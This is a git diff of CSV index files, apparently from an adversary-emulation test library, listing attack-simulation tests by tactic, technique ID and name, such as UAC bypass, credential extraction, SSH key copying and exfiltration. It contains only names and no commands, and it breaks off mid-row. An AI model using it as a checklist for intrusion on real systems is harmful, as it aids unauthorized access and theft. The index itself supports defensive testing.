Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh -defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell +defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell @@ -321,8 +357,6 @@ defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f1 defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh -defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh -defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt @@ -333,6 +367,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9 defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell +defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh +defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt @@ -407,7 +443,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3 defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell @@ -444,6 +482,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt +defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh @@ -657,12 +697,14 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell +execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt @@ -717,36 +759,6 @@ command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f- command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh -collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell -collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt -collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt -collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt -collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt -collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh -collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh -collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh -collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh -collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell -collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt -collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell -collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell -collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt -collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt -collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell -collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash -collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell -collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash -collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell -collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell -collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell -collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash -collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell -collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell -collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash -collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash -collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash -collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash -collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 5e0d0cf0..d5c4b268 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -41,6 +41,13 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh +collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh +collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh +collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh +collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash +collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash +collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh @@ -62,9 +69,9 @@ defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562 defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash -defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh -defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh +defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh +defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh @@ -144,13 +151,6 @@ command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-42 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh -collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh -collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh -collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh -collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh -collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash -collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash -collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 099d86f8..e108fcdf 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -41,6 +41,24 @@ persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash +credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh +credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh +credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash +credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh +credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash +credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh +credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh +collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh +collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh +collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh +collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh +collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash +collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash +collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash +collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash +collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh @@ -58,8 +76,6 @@ defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh -defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh -defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh @@ -67,6 +83,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh +defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh +defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash @@ -143,25 +161,7 @@ command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh -collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh -collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh -collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh -collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh -collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash -collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash -collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash -collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash -collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual -credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh -credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash -credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh -credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh -credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash -credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh -credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash -credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh -credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 241e57a5..2bcc0b8f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,4 +1,66 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name +credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell +credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell +credential-access,T1552.001,Credentials In Files,4,Access 